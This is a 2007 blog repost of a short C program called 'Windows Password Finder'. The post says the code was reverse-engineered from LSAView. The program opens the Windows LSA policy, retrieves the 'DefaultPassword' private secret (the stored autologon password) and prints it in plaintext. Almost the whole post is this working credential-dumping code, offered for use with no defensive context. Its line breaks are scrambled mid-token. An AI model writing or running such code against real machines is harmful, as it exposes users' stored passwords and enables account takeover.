Windows Password Finder

Published on 2007 - 06 - 04

这个是isno从LSAView里逆向后改写的代码,转过来:

#include <windows.h>
#
include <ntsecapi.h>
#
include <tchar.h>
#
include <stdio.h>

#pragma comment(lib,"advapi32.lib")

int _tmain(int argc
, TCHAR* argv[], TCHAR* envp[])
{
int nRetCode
= 0;
char private_data[
0x500] = {0};
int data_len;
LSA_OBJECT_ATTRIBUTES lsa_object_attr;
LSA_HANDLE lsa_handle;
PLSA_UNICODE_STRING plsa_private_data;
LSA_UNICODE_STRING lsa_keyname;
NTSTATUS status;
int ret;

memset(
&lsa_object_attr, 0, sizeof(lsa_object_attr));
lsa_object_attr
.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
LsaOpenPolicy(
0, &lsa_object_attr, 0x800, &lsa_handle);

plsa_private_data
= (PLSA_UNICODE_STRING)malloc(sizeof(LSA_UNICODE_STRING));
plsa_private_data
->Length = 0x500;
plsa_private_data
->MaximumLength = 0x500;
plsa_private_data
->Buffer = (PWSTR)malloc(0x500);

lsa_keyname
.MaximumLength = 0x200;
lsa_keyname
.Buffer = (PWSTR)malloc(0x200);
wcscpy(lsa_keyname
.Buffer,L"DefaultPassword");
lsa_keyname
.Length = wcslen(lsa_keyname.Buffer) * 2;

status
= LsaRetrievePrivateData(lsa_handle,
&lsa_keyname,
&plsa_private_data);
LsaClose(lsa_handle);
if(status != 0)
{
printf("[-] LsaRetrievePrivateData failed: %d\n",
LsaNtStatusToWinError(status));
return 0;
}
ret
= WideCharToMultiByte(0, 0, plsa_private_data->Buffer,
plsa_private_data
->Length,
private_data
, sizeof(private_data), 0, 0);
if(ret == 0)
{
printf("[-] WideCharToMultiByte failed:%d\n", GetLastError());
return 0;
}
data_len
= ret;

printf("Default Password: %s\r\n", private_data);
return nRetCode;
}
Comments
Write a Comment